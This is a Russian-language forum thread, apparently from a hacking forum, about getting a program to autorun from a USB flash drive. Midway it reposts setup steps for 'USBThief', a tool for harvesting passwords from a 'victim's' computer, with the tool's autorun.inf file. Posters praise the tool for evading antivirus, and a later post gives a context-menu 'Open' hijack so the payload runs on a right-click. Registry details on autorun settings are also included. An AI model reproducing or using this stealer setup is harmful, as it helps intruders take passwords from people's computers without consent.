Как можно сделать автозапуск с флешки, чтобы когда я её воткну программа на флешке автоматически запускалась Пробовал inf файл создавать [autorun] open=opera.exe icon=icon.ico Но так не работает. Как это можно сделать?
Либо у тебя авторан выключен, либо файла opera.exe в корне флешки нет, либо ты inf файл криво обозвал
Я пробовал файл autorun.inf создавать и в нём написал [autorun] open=opera.exe icon=icon.ico Kaimi если он выключен какой ключ реестра его включает?
Источник http://forum.antichat.ru/thread63601-usbthief.html Итак, для установки нам потребуется USB наситель и данная програмка. Распакуйте архив, и из папки USBThief скопируете всё на флэшку. (Важно!!! Вы ДОЛЖНЫ скопировать все файлы в главную дирикторию USB насителя! Никаких папок создавать не надо!) Как работает: Вставьте USB в компьютер Вашей жертвы В папке "dump" на USB вы увидите все пароли Ссыли: 1--- 2--- А вот содержимое авторана [autorun] action=Open Files On Folder icon=icons\drive.ico shellexecute=nircmd.exe execmd CALL batexe\progstart.bat
nircmd собирает пассы, типа пинча только нужно флешку вставить! Отличается от пинча тем что не палится!
У меня тоже не работает. Я все сделал как ты написал. но голяк. Может там еще чтото нужно добавить или изменить?
у меня тоже не катить автоматический запуск, после двойного клика начинает запускатся. А что если человек решил открыть правой кнопкой мыши?
- пока что эффективного алгоритма, предугадывающего действия человека, не придумано - если не запускается автозапуском, значит он (автозапуск) отключен для сменных устройств (имхо)
Какой-нибудь твикер делается вот так: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer NoDriveTypeAutoRun Допустимые значения ключа: 0x1 - отключить автозапуск на приводах неизвестных типов 0x4 - отключить автозапуск сьемных устройств 0x8 - отключить автозапуск НЕсьемных устройств 0x10 - отключить автозапуск сетевых дисков 0x20 - отключить автозапуск CD-приводов 0x40 - отключить автозапуск RAM-дисков 0x80 - отключить автозапуск на приводах неизвестных типов 0xFF - отключить автозапуск вообще всех дисков. Значения могут комбинироваться суммированием их числовых значений. Значения по умолчанию: 0x95 - Windows 2000 и 2003 (отключен автозапуск сьемных, сетевых и неизвестных дисков) 0x91 - Windows XP (отключен автозапуск сетевых и неизвестных дисков) Так же можно это осуществить с помощью групповых политик: Конфигурация компьютера->административные шаблоны->Система->отключить автозапуск. В случае с WinXP Home Edition применима только правка реестра вручную из-за отсутствия инструмента правки групповых политик.
Добавь в авторан: shell\1=Открыть shell\1\Command=start.bat И в контекстном меню первым будет стоять это "Открыть". Палится тем что будет два "Открыть". Встречал системы где это не работает, пунк контекстного меню не первый, но на большинстве все ОК.
А как запускаются вири с флешок ? Им помоему вообще наплевать на ключ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\Explorer
Обьясните кто нибудь? вчера рылсяу друга по флеше(принес вирусов поубивать), и нарыл червя Win32.Kido-C. так вот у него в авторане вообще какая-то левая фигня(т.е. нет страндартных open и т.д), как по мне смхивает на машинный код. и работает т.к. доктор прописал. кто обьяснит?. сам файл могу выложить если интерестно